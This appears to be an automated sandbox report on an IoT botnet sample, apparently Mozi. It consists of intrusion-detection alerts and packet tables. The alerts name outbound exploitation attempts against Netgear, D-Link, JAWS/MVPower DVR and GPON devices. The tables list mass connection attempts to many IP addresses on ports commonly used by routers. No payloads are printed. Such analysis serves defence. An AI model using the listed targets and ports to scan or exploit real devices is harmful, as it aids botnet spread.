                                                                                                          01/06/21-19:32:52.218979ICMP399ICMP Destination Unreachable Host Unreachable185.43.204.129192.168.2.20
                                                                                                          01/06/21-19:32:52.219008ICMP399ICMP Destination Unreachable Host Unreachable185.43.204.129192.168.2.20
                                                                                                          01/06/21-19:32:53.317797ICMP449ICMP Time-To-Live Exceeded in Transit104.254.118.171192.168.2.20
                                                                                                          01/06/21-19:32:53.436681ICMP449ICMP Time-To-Live Exceeded in Transit201.20.104.206192.168.2.20
                                                                                                          01/06/21-19:32:53.356446TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4407680192.168.2.20192.34.60.236
                                                                                                          01/06/21-19:32:53.356446TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4407680192.168.2.20192.34.60.236
                                                                                                          01/06/21-19:32:54.482262ICMP399ICMP Destination Unreachable Host Unreachable58.160.251.5192.168.2.20
                                                                                                          01/06/21-19:32:55.218954ICMP399ICMP Destination Unreachable Host Unreachable185.43.204.129192.168.2.20
                                                                                                          01/06/21-19:32:55.323322ICMP399ICMP Destination Unreachable Host Unreachable89.161.78.241192.168.2.20
                                                                                                          01/06/21-19:32:55.323348ICMP399ICMP Destination Unreachable Host Unreachable89.161.78.241192.168.2.20
                                                                                                          01/06/21-19:32:57.331497TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5536680192.168.2.2091.233.85.66
                                                                                                          01/06/21-19:32:57.331497TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5536680192.168.2.2091.233.85.66
                                                                                                          01/06/21-19:33:07.288767TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4105080192.168.2.20167.82.102.91
                                                                                                          01/06/21-19:33:07.288767TCP2025883ET EXPLOIT MVPower DVR Shell UCE4105080192.168.2.20167.82.102.91
                                                                                                          01/06/21-19:33:09.249131ICMP485ICMP Destination Unreachable Communication Administratively Prohibited90.161.157.169192.168.2.20
                                                                                                          01/06/21-19:33:10.229507ICMP449ICMP Time-To-Live Exceeded in Transit83.230.38.193192.168.2.20
                                                                                                          01/06/21-19:33:17.207419ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.216.150.65192.168.2.20
                                                                                                          01/06/21-19:33:21.183895ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                          01/06/21-19:33:21.210882ICMP449ICMP Time-To-Live Exceeded in Transit31.7.246.208192.168.2.20
                                                                                                          01/06/21-19:33:27.668049UDP2030919ET TROJAN Mozi Botnet DHT Config Sent704928537202.164.139.21192.168.2.20
                                                                                                          01/06/21-19:33:28.352059ICMP402ICMP Destination Unreachable Port Unreachable122.177.154.2192.168.2.20
                                                                                                          01/06/21-19:33:28.495600ICMP449ICMP Time-To-Live Exceeded in Transit203.174.176.154192.168.2.20
                                                                                                          01/06/21-19:33:29.023546UDP2030919ET TROJAN Mozi Botnet DHT Config Sent570652853769.92.67.36192.168.2.20
                                                                                                          01/06/21-19:33:29.208363ICMP401ICMP Destination Unreachable Network Unreachable81.228.87.91192.168.2.20
                                                                                                          01/06/21-19:33:29.334743ICMP399ICMP Destination Unreachable Host Unreachable71.156.195.71192.168.2.20
                                                                                                          01/06/21-19:33:31.379768ICMP402ICMP Destination Unreachable Port Unreachable50.64.77.202192.168.2.20
                                                                                                          01/06/21-19:33:35.320141ICMP449ICMP Time-To-Live Exceeded in Transit156.110.214.142192.168.2.20
                                                                                                          01/06/21-19:33:35.369902ICMP402ICMP Destination Unreachable Port Unreachable189.150.157.109192.168.2.20
                                                                                                          01/06/21-19:33:36.334845ICMP399ICMP Destination Unreachable Host Unreachable68.87.195.114192.168.2.20
                                                                                                          01/06/21-19:33:36.382659ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited77.123.130.180192.168.2.20
                                                                                                          01/06/21-19:33:37.395931TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3367480192.168.2.20139.162.182.70
                                                                                                          01/06/21-19:33:37.395931TCP2025883ET EXPLOIT MVPower DVR Shell UCE3367480192.168.2.20139.162.182.70
                                                                                                          01/06/21-19:33:39.466826ICMP399ICMP Destination Unreachable Host Unreachable100.72.254.54192.168.2.20
                                                                                                          01/06/21-19:33:39.466890ICMP399ICMP Destination Unreachable Host Unreachable100.72.254.54192.168.2.20
                                                                                                          01/06/21-19:33:39.466918ICMP399ICMP Destination Unreachable Host Unreachable100.72.254.54192.168.2.20
                                                                                                          01/06/21-19:33:40.212073ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.78.52.239192.168.2.20
                                                                                                          01/06/21-19:33:43.281371ICMP399ICMP Destination Unreachable Host Unreachable173.212.127.65192.168.2.20
                                                                                                          01/06/21-19:33:43.318503ICMP485ICMP Destination Unreachable Communication Administratively Prohibited202.88.190.46192.168.2.20
                                                                                                          01/06/21-19:33:43.428563UDP2030919ET TROJAN Mozi Botnet DHT Config Sent4556328537202.164.139.181192.168.2.20
                                                                                                          01/06/21-19:33:43.458074ICMP449ICMP Time-To-Live Exceeded in Transit187.100.175.89192.168.2.20
                                                                                                          01/06/21-19:33:45.212600ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.247.172.145192.168.2.20
                                                                                                          01/06/21-19:33:49.207263ICMP401ICMP Destination Unreachable Network Unreachable81.228.84.167192.168.2.20
                                                                                                          01/06/21-19:33:50.590352TCP1200ATTACK-RESPONSES Invalid URL803431623.210.67.167192.168.2.20
                                                                                                          01/06/21-19:33:52.196226ICMP485ICMP Destination Unreachable Communication Administratively Prohibited78.34.32.117192.168.2.20
                                                                                                          01/06/21-19:33:52.450401ICMP402ICMP Destination Unreachable Port Unreachable123.248.103.138192.168.2.20
                                                                                                          01/06/21-19:33:55.307929ICMP399ICMP Destination Unreachable Host Unreachable64.59.180.82192.168.2.20
                                                                                                          01/06/21-19:33:56.221834ICMP402ICMP Destination Unreachable Port Unreachable87.110.131.81192.168.2.20
                                                                                                          01/06/21-19:33:56.319020ICMP449ICMP Time-To-Live Exceeded in Transit162.0.253.113192.168.2.20
                                                                                                          01/06/21-19:33:57.178483ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.212.28.148192.168.2.20
                                                                                                          01/06/21-19:34:00.365307ICMP399ICMP Destination Unreachable Host Unreachable64.59.134.226192.168.2.20
                                                                                                          01/06/21-19:34:03.219293ICMP399ICMP Destination Unreachable Host Unreachable31.178.122.47192.168.2.20
                                                                                                          01/06/21-19:34:03.234790ICMP485ICMP Destination Unreachable Communication Administratively Prohibited95.238.97.92192.168.2.20
                                                                                                          01/06/21-19:34:03.299431ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited64.33.158.155192.168.2.20
                                                                                                          01/06/21-19:34:10.201447ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.157.131.61192.168.2.20
                                                                                                          01/06/21-19:34:12.806750ICMP399ICMP Destination Unreachable Host Unreachable122.211.60.2192.168.2.20
                                                                                                          01/06/21-19:34:17.333464ICMP485ICMP Destination Unreachable Communication Administratively Prohibited204.148.10.26192.168.2.20
                                                                                                          01/06/21-19:34:17.293637TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4774280192.168.2.2015.161.88.49
                                                                                                          01/06/21-19:34:17.293637TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4774280192.168.2.2015.161.88.49
                                                                                                          01/06/21-19:34:17.498872TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4835280192.168.2.2023.214.76.71
                                                                                                          01/06/21-19:34:17.498872TCP2025883ET EXPLOIT MVPower DVR Shell UCE4835280192.168.2.2023.214.76.71
                                                                                                          01/06/21-19:34:17.818929ICMP399ICMP Destination Unreachable Host Unreachable103.5.76.133192.168.2.20
                                                                                                          01/06/21-19:34:18.232956TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5892880192.168.2.20103.47.16.235
                                                                                                          01/06/21-19:34:20.197363ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.142.196.62192.168.2.20
                                                                                                          01/06/21-19:34:22.989079ICMP402ICMP Destination Unreachable Port Unreachable89.95.247.201192.168.2.20
                                                                                                          01/06/21-19:34:23.407121ICMP399ICMP Destination Unreachable Host Unreachable152.231.102.126192.168.2.20
                                                                                                          01/06/21-19:34:24.236580ICMP401ICMP Destination Unreachable Network Unreachable80.169.237.142192.168.2.20
                                                                                                          01/06/21-19:34:24.253492ICMP485ICMP Destination Unreachable Communication Administratively Prohibited178.11.2.209192.168.2.20
                                                                                                          01/06/21-19:34:24.440326ICMP449ICMP Time-To-Live Exceeded in Transit69.43.129.58192.168.2.20
                                                                                                          01/06/21-19:34:26.430133ICMP399ICMP Destination Unreachable Host Unreachable152.231.102.126192.168.2.20
                                                                                                          01/06/21-19:34:27.387013ICMP399ICMP Destination Unreachable Host Unreachable41.79.224.42192.168.2.20
                                                                                                          01/06/21-19:34:27.387042ICMP399ICMP Destination Unreachable Host Unreachable41.79.224.42192.168.2.20
                                                                                                          01/06/21-19:34:27.453179ICMP399ICMP Destination Unreachable Host Unreachable112.190.139.126192.168.2.20
                                                                                                          01/06/21-19:34:27.453206ICMP399ICMP Destination Unreachable Host Unreachable112.190.139.126192.168.2.20
                                                                                                          01/06/21-19:34:29.316807ICMP399ICMP Destination Unreachable Host Unreachable24.164.239.119192.168.2.20
                                                                                                          01/06/21-19:34:29.355089TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5033680192.168.2.20178.88.225.33
                                                                                                          01/06/21-19:34:29.355089TCP2025883ET EXPLOIT MVPower DVR Shell UCE5033680192.168.2.20178.88.225.33
                                                                                                          01/06/21-19:34:30.399749ICMP399ICMP Destination Unreachable Host Unreachable41.79.224.42192.168.2.20
                                                                                                          01/06/21-19:34:30.459595ICMP399ICMP Destination Unreachable Host Unreachable112.190.139.126192.168.2.20
                                                                                                          01/06/21-19:34:31.222432ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.97.32.88192.168.2.20
                                                                                                          01/06/21-19:34:31.893105ICMP399ICMP Destination Unreachable Host Unreachable115.125.212.1192.168.2.20
                                                                                                          01/06/21-19:34:34.387840ICMP399ICMP Destination Unreachable Host Unreachable216.110.207.66192.168.2.20
                                                                                                          01/06/21-19:34:34.474572ICMP449ICMP Time-To-Live Exceeded in Transit115.112.142.90192.168.2.20
                                                                                                          01/06/21-19:34:35.220297ICMP449ICMP Time-To-Live Exceeded in Transit213.249.105.38192.168.2.20
                                                                                                          01/06/21-19:34:37.508892TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)488228080192.168.2.20115.160.28.65
                                                                                                          01/06/21-19:34:37.508892TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)488228080192.168.2.20115.160.28.65
                                                                                                          01/06/21-19:34:38.140838ICMP449ICMP Time-To-Live Exceeded in Transit143.137.248.109192.168.2.20
                                                                                                          01/06/21-19:34:38.216521ICMP485ICMP Destination Unreachable Communication Administratively Prohibited95.33.139.238192.168.2.20
                                                                                                          01/06/21-19:34:38.349822ICMP485ICMP Destination Unreachable Communication Administratively Prohibited88.64.229.37192.168.2.20
                                                                                                          01/06/21-19:34:38.442424ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.218.71.141192.168.2.20
                                                                                                          01/06/21-19:34:41.179557ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                          01/06/21-19:34:45.206793ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.220.250.219192.168.2.20
                                                                                                          01/06/21-19:34:45.211200ICMP485ICMP Destination Unreachable Communication Administratively Prohibited37.138.45.246192.168.2.20
                                                                                                          01/06/21-19:34:45.232125ICMP399ICMP Destination Unreachable Host Unreachable37.128.225.114192.168.2.20
                                                                                                          01/06/21-19:34:45.308594TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5650280192.168.2.2082.75.175.45
                                                                                                          01/06/21-19:34:45.308594TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5650280192.168.2.2082.75.175.45
                                                                                                          01/06/21-19:34:45.435605ICMP402ICMP Destination Unreachable Port Unreachable189.97.128.90192.168.2.20
                                                                                                          01/06/21-19:34:46.211293ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.157.186.236192.168.2.20
                                                                                                          01/06/21-19:34:48.425475ICMP399ICMP Destination Unreachable Host Unreachable157.14.30.3192.168.2.20
                                                                                                          01/06/21-19:34:48.425487ICMP399ICMP Destination Unreachable Host Unreachable157.14.30.3192.168.2.20
                                                                                                          01/06/21-19:34:50.470291TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4872680192.168.2.20113.161.79.231
                                                                                                          01/06/21-19:34:50.470291TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4872680192.168.2.20113.161.79.231
                                                                                                          01/06/21-19:34:51.429508ICMP399ICMP Destination Unreachable Host Unreachable157.14.30.3192.168.2.20
                                                                                                          01/06/21-19:34:52.315856ICMP402ICMP Destination Unreachable Port Unreachable136.34.214.159192.168.2.20
                                                                                                          01/06/21-19:34:52.303077TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4197280192.168.2.2015.237.62.51
                                                                                                          01/06/21-19:34:52.303077TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4197280192.168.2.2015.237.62.51
                                                                                                          01/06/21-19:34:53.320285ICMP449ICMP Time-To-Live Exceeded in Transit216.175.40.97192.168.2.20
                                                                                                          01/06/21-19:34:53.390895ICMP401ICMP Destination Unreachable Network Unreachable100.100.104.30192.168.2.20
                                                                                                          01/06/21-19:34:59.207248ICMP401ICMP Destination Unreachable Network Unreachable212.158.129.246192.168.2.20
                                                                                                          01/06/21-19:34:59.354630ICMP449ICMP Time-To-Live Exceeded in Transit167.234.10.23192.168.2.20
                                                                                                          01/06/21-19:34:59.393142TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5417880192.168.2.2013.249.130.85
                                                                                                          01/06/21-19:34:59.393142TCP2025883ET EXPLOIT MVPower DVR Shell UCE5417880192.168.2.2013.249.130.85
                                                                                                          01/06/21-19:34:59.544140TCP1201ATTACK-RESPONSES 403 Forbidden805417813.249.130.85192.168.2.20
                                                                                                          01/06/21-19:35:02.227793ICMP399ICMP Destination Unreachable Host Unreachable185.228.111.9192.168.2.20
                                                                                                          01/06/21-19:35:02.227850ICMP399ICMP Destination Unreachable Host Unreachable185.228.111.9192.168.2.20
                                                                                                          01/06/21-19:35:02.312656ICMP402ICMP Destination Unreachable Port Unreachable136.61.214.222192.168.2.20
                                                                                                          01/06/21-19:35:02.360094ICMP399ICMP Destination Unreachable Host Unreachable100.98.0.6192.168.2.20
                                                                                                          01/06/21-19:35:02.360159ICMP399ICMP Destination Unreachable Host Unreachable100.98.0.6192.168.2.20
                                                                                                          01/06/21-19:35:03.242236ICMP399ICMP Destination Unreachable Host Unreachable88.113.226.3192.168.2.20
                                                                                                          01/06/21-19:35:05.227872ICMP399ICMP Destination Unreachable Host Unreachable185.228.111.9192.168.2.20
                                                                                                          01/06/21-19:35:05.360084ICMP399ICMP Destination Unreachable Host Unreachable100.98.0.6192.168.2.20
                                                                                                          01/06/21-19:35:06.199482ICMP399ICMP Destination Unreachable Host Unreachable217.170.96.43192.168.2.20
                                                                                                          01/06/21-19:35:06.199521ICMP399ICMP Destination Unreachable Host Unreachable217.170.96.43192.168.2.20
                                                                                                          01/06/21-19:35:06.226272ICMP449ICMP Time-To-Live Exceeded in Transit10.152.6.22192.168.2.20
                                                                                                          01/06/21-19:35:06.431147ICMP399ICMP Destination Unreachable Host Unreachable172.20.2.186192.168.2.20
                                                                                                          01/06/21-19:35:06.446827ICMP402ICMP Destination Unreachable Port Unreachable189.105.19.22192.168.2.20
                                                                                                          01/06/21-19:35:07.302426ICMP449ICMP Time-To-Live Exceeded in Transit142.243.250.26192.168.2.20
                                                                                                          01/06/21-19:35:09.199500ICMP399ICMP Destination Unreachable Host Unreachable217.170.96.43192.168.2.20
                                                                                                          01/06/21-19:35:14.235080ICMP485ICMP Destination Unreachable Communication Administratively Prohibited147.52.1.114192.168.2.20
                                                                                                          01/06/21-19:35:16.406000ICMP399ICMP Destination Unreachable Host Unreachable112.189.140.46192.168.2.20
                                                                                                          01/06/21-19:35:17.377205ICMP399ICMP Destination Unreachable Host Unreachable176.236.110.96192.168.2.20
                                                                                                          01/06/21-19:35:19.338018ICMP399ICMP Destination Unreachable Host Unreachable173.219.221.213192.168.2.20
                                                                                                          01/06/21-19:35:22.455530ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                          01/06/21-19:35:23.237176ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.214.251.101192.168.2.20
                                                                                                          01/06/21-19:35:23.326274ICMP449ICMP Time-To-Live Exceeded in Transit103.249.240.84192.168.2.20
                                                                                                          01/06/21-19:35:27.219353ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.142.100.71192.168.2.20
                                                                                                          01/06/21-19:35:27.236010ICMP449ICMP Time-To-Live Exceeded in Transit79.128.227.225192.168.2.20
                                                                                                          01/06/21-19:35:27.373481ICMP449ICMP Time-To-Live Exceeded in Transit160.119.142.3192.168.2.20
                                                                                                          01/06/21-19:35:28.235371ICMP399ICMP Destination Unreachable Host Unreachable193.136.134.150192.168.2.20
                                                                                                          01/06/21-19:33:50.427550TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3431680192.168.2.2023.210.67.167
                                                                                                          01/06/21-19:33:38.317818TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution3712880192.168.2.2085.214.105.212
                                                                                                          01/06/21-19:33:04.326170TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5393680192.168.2.2081.6.188.111
                                                                                                          01/06/21-19:33:03.403190TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5776080192.168.2.2092.246.94.253

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 6, 2021 19:31:15.962713003 CET404965555192.168.2.20110.240.138.18
                                                                                                          Jan 6, 2021 19:31:15.962893009 CET3635852869192.168.2.20180.242.224.123
                                                                                                          Jan 6, 2021 19:31:15.962955952 CET3916280192.168.2.20134.208.96.106
                                                                                                          Jan 6, 2021 19:31:15.963063955 CET378528443192.168.2.20194.120.187.83
                                                                                                          Jan 6, 2021 19:31:15.963139057 CET5005281192.168.2.2017.226.218.78
                                                                                                          Jan 6, 2021 19:31:15.963185072 CET4493449152192.168.2.20167.35.185.166
                                                                                                          Jan 6, 2021 19:31:15.963282108 CET353345555192.168.2.20185.252.99.21
                                                                                                          Jan 6, 2021 19:31:15.963320017 CET5293280192.168.2.20108.93.69.18
                                                                                                          Jan 6, 2021 19:31:15.963398933 CET587448443192.168.2.2025.17.15.19
                                                                                                          Jan 6, 2021 19:31:15.963439941 CET4034280192.168.2.20204.33.51.57
                                                                                                          Jan 6, 2021 19:31:15.963512897 CET4143881192.168.2.20126.140.98.187
                                                                                                          Jan 6, 2021 19:31:15.963578939 CET397388080192.168.2.2017.103.148.14
                                                                                                          Jan 6, 2021 19:31:15.963654995 CET3815037215192.168.2.20173.46.232.71
                                                                                                          Jan 6, 2021 19:31:15.963715076 CET504885555192.168.2.209.23.193.235
                                                                                                          Jan 6, 2021 19:31:15.963783979 CET593265555192.168.2.20148.8.199.238
                                                                                                          Jan 6, 2021 19:31:15.963862896 CET450008080192.168.2.20191.194.67.143
                                                                                                          Jan 6, 2021 19:31:15.963923931 CET4493880192.168.2.2095.42.94.59
                                                                                                          Jan 6, 2021 19:31:15.963989019 CET5505480192.168.2.2083.186.9.176
                                                                                                          Jan 6, 2021 19:31:15.964055061 CET4293680192.168.2.2074.222.223.162
                                                                                                          Jan 6, 2021 19:31:15.964226961 CET3475080192.168.2.207.209.72.35
                                                                                                          Jan 6, 2021 19:31:15.964312077 CET565845555192.168.2.20191.19.130.89
                                                                                                          Jan 6, 2021 19:31:15.964378119 CET495788080192.168.2.20174.116.188.92
                                                                                                          Jan 6, 2021 19:31:15.964457035 CET547565555192.168.2.2060.49.142.109
                                                                                                          Jan 6, 2021 19:31:15.964628935 CET3568680192.168.2.2094.90.118.217
                                                                                                          Jan 6, 2021 19:31:15.964684963 CET6083280192.168.2.20199.86.216.179
                                                                                                          Jan 6, 2021 19:31:15.964744091 CET5659680192.168.2.20194.171.127.193
                                                                                                          Jan 6, 2021 19:31:15.964803934 CET565425555192.168.2.20115.153.49.223
                                                                                                          Jan 6, 2021 19:31:15.964885950 CET4617252869192.168.2.20175.130.144.51
                                                                                                          Jan 6, 2021 19:31:15.964984894 CET361107574192.168.2.20199.129.123.23
                                                                                                          Jan 6, 2021 19:31:15.965051889 CET331708080192.168.2.20194.70.177.118
                                                                                                          Jan 6, 2021 19:31:15.965162992 CET3601080192.168.2.20196.157.245.80
                                                                                                          Jan 6, 2021 19:31:15.965177059 CET5056080192.168.2.2033.184.214.99
                                                                                                          Jan 6, 2021 19:31:15.965253115 CET4673280192.168.2.2020.162.238.193
                                                                                                          Jan 6, 2021 19:31:15.965290070 CET609868443192.168.2.2075.245.97.93
                                                                                                          Jan 6, 2021 19:31:15.965364933 CET4619480192.168.2.20222.170.3.234
                                                                                                          Jan 6, 2021 19:31:15.965441942 CET5967081192.168.2.2076.4.181.236
                                                                                                          Jan 6, 2021 19:31:15.965508938 CET565528080192.168.2.2089.135.205.190
                                                                                                          Jan 6, 2021 19:31:15.965583086 CET3761281192.168.2.20187.136.236.154
                                                                                                          Jan 6, 2021 19:31:15.965645075 CET609467574192.168.2.20153.172.56.219
                                                                                                          Jan 6, 2021 19:31:15.965712070 CET3836449152192.168.2.20187.68.238.155
                                                                                                          Jan 6, 2021 19:31:15.965774059 CET5004249152192.168.2.20172.196.147.205
                                                                                                          Jan 6, 2021 19:31:15.965848923 CET374588443192.168.2.2082.90.22.100
                                                                                                          Jan 6, 2021 19:31:15.965919018 CET452165555192.168.2.20105.46.196.121
                                                                                                          Jan 6, 2021 19:31:15.965977907 CET6054480192.168.2.20141.101.65.109
                                                                                                          Jan 6, 2021 19:31:15.966032982 CET5327680192.168.2.20135.216.63.34
                                                                                                          Jan 6, 2021 19:31:15.966103077 CET550788080192.168.2.20101.207.79.110
                                                                                                          Jan 6, 2021 19:31:15.966166019 CET5681681192.168.2.20152.131.171.80
                                                                                                          Jan 6, 2021 19:31:15.966223001 CET387888080192.168.2.2039.230.188.152
                                                                                                          Jan 6, 2021 19:31:15.966289043 CET5978237215192.168.2.20108.180.252.214
                                                                                                          Jan 6, 2021 19:31:15.966362000 CET393987574192.168.2.20146.171.127.198
                                                                                                          Jan 6, 2021 19:31:15.966428041 CET3710080192.168.2.20133.188.108.105
                                                                                                          Jan 6, 2021 19:31:15.966496944 CET446208080192.168.2.2098.101.186.102
                                                                                                          Jan 6, 2021 19:31:15.966547966 CET5871480192.168.2.2084.8.11.50
                                                                                                          Jan 6, 2021 19:31:15.966598988 CET461668080192.168.2.2089.54.32.71
                                                                                                          Jan 6, 2021 19:31:15.966656923 CET5523652869192.168.2.2097.19.237.236
                                                                                                          Jan 6, 2021 19:31:15.966706991 CET522607574192.168.2.20139.115.248.246
                                                                                                          Jan 6, 2021 19:31:15.966766119 CET4774880192.168.2.2079.150.136.104
                                                                                                          Jan 6, 2021 19:31:15.966820002 CET4811081192.168.2.2059.115.70.23
                                                                                                          Jan 6, 2021 19:31:15.966872931 CET4157080192.168.2.20186.111.156.161
                                                                                                          Jan 6, 2021 19:31:15.966945887 CET373508080192.168.2.2074.164.61.210
                                                                                                          Jan 6, 2021 19:31:15.966970921 CET388345555192.168.2.20101.154.10.135
                                                                                                          Jan 6, 2021 19:31:15.967027903 CET440045555192.168.2.2048.190.253.52
                                                                                                          Jan 6, 2021 19:31:15.967118025 CET3486081192.168.2.20100.52.110.183
                                                                                                          Jan 6, 2021 19:31:15.967664957 CET5947880192.168.2.2058.93.162.166
                                                                                                          Jan 6, 2021 19:31:15.967667103 CET502587574192.168.2.20195.10.66.60
                                                                                                          Jan 6, 2021 19:31:15.967700005 CET4410852869192.168.2.2045.90.39.155
                                                                                                          Jan 6, 2021 19:31:15.967761040 CET4149280192.168.2.20120.182.16.69
                                                                                                          Jan 6, 2021 19:31:15.967818022 CET396965555192.168.2.2016.78.38.159
                                                                                                          Jan 6, 2021 19:31:15.967863083 CET539448080192.168.2.2017.145.188.167
                                                                                                          Jan 6, 2021 19:31:15.967914104 CET5241080192.168.2.20113.237.180.35
                                                                                                          Jan 6, 2021 19:31:15.967963934 CET371148080192.168.2.20116.18.170.242
                                                                                                          Jan 6, 2021 19:31:15.968005896 CET4052480192.168.2.20134.58.226.164
                                                                                                          Jan 6, 2021 19:31:15.968065023 CET5303280192.168.2.20160.99.178.110
                                                                                                          Jan 6, 2021 19:31:15.968127966 CET5938037215192.168.2.20113.9.130.10
                                                                                                          Jan 6, 2021 19:31:15.968183041 CET6013880192.168.2.20161.146.42.233
                                                                                                          Jan 6, 2021 19:31:15.968245983 CET432208443192.168.2.20120.130.230.100
                                                                                                          Jan 6, 2021 19:31:15.968292952 CET5500052869192.168.2.20157.11.78.115
                                                                                                          Jan 6, 2021 19:31:15.968360901 CET4990080192.168.2.20133.119.177.11
                                                                                                          Jan 6, 2021 19:31:15.968368053 CET427388080192.168.2.20160.179.191.126
                                                                                                          Jan 6, 2021 19:31:15.968401909 CET478348080192.168.2.20191.114.3.228
                                                                                                          Jan 6, 2021 19:31:15.968446016 CET400268080192.168.2.2022.151.58.160
                                                                                                          Jan 6, 2021 19:31:15.968461037 CET5190837215192.168.2.20101.13.186.3
                                                                                                          Jan 6, 2021 19:31:15.968501091 CET409465555192.168.2.2012.216.98.131
                                                                                                          Jan 6, 2021 19:31:15.968529940 CET439728080192.168.2.20121.95.250.247
                                                                                                          Jan 6, 2021 19:31:15.968575954 CET4639280192.168.2.2020.25.43.107
                                                                                                          Jan 6, 2021 19:31:15.968612909 CET4261280192.168.2.20209.139.169.200
                                                                                                          Jan 6, 2021 19:31:15.968619108 CET4077881192.168.2.2040.55.32.94
                                                                                                          Jan 6, 2021 19:31:15.968650103 CET388165555192.168.2.2049.96.132.149
                                                                                                          Jan 6, 2021 19:31:15.968674898 CET4415480192.168.2.2056.28.199.88
                                                                                                          Jan 6, 2021 19:31:15.968702078 CET4402249152192.168.2.2020.125.190.187
                                                                                                          Jan 6, 2021 19:31:15.968727112 CET333348080192.168.2.2016.141.242.228
                                                                                                          Jan 6, 2021 19:31:15.968760967 CET441745555192.168.2.2062.250.85.170
                                                                                                          Jan 6, 2021 19:31:15.968784094 CET5581837215192.168.2.2086.118.67.217
                                                                                                          Jan 6, 2021 19:31:15.968815088 CET570827574192.168.2.20139.232.194.9
                                                                                                          Jan 6, 2021 19:31:15.968874931 CET600868443192.168.2.2091.81.75.27
                                                                                                          Jan 6, 2021 19:31:15.968897104 CET4501880192.168.2.2040.209.84.236
                                                                                                          Jan 6, 2021 19:31:15.968900919 CET4967880192.168.2.2060.182.50.185
                                                                                                          Jan 6, 2021 19:31:15.968969107 CET4639252869192.168.2.20136.183.108.224
                                                                                                          Jan 6, 2021 19:31:15.968996048 CET5011480192.168.2.20165.82.96.74
                                                                                                          Jan 6, 2021 19:31:15.969033957 CET517928443192.168.2.20128.138.242.245

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 6, 2021 19:31:36.634013891 CET4619053192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:31:36.682205915 CET53461908.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.684146881 CET285376881192.168.2.20212.129.33.59
                                                                                                          Jan 6, 2021 19:31:36.684206963 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.685122013 CET4006053192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:31:36.735800982 CET53400608.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.736108065 CET285376881192.168.2.2067.215.246.10
                                                                                                          Jan 6, 2021 19:31:36.736896038 CET3532053192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:31:36.737353086 CET68812853787.98.162.88192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.784712076 CET53353208.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.785073996 CET285376881192.168.2.2082.221.103.244
                                                                                                          Jan 6, 2021 19:31:36.785867929 CET5241953192.168.2.208.8.8.8
                                                                                                          Jan 6, 2021 19:31:36.842376947 CET53524198.8.8.8192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.842674971 CET285376881192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:36.843030930 CET285376881192.168.2.20212.129.33.59
                                                                                                          Jan 6, 2021 19:31:36.843091965 CET285376881192.168.2.2082.221.103.244
                                                                                                          Jan 6, 2021 19:31:36.843096018 CET285376881192.168.2.20130.239.18.159
                                                                                                          Jan 6, 2021 19:31:36.843135118 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.845067024 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.875196934 CET68812853782.221.103.244192.168.2.20
                                                                                                          Jan 6, 2021 19:31:36.875741005 CET285376881192.168.2.2087.98.162.88
                                                                                                          Jan 6, 2021 19:31:36.896120071 CET68812853787.98.162.88192.168.2.20
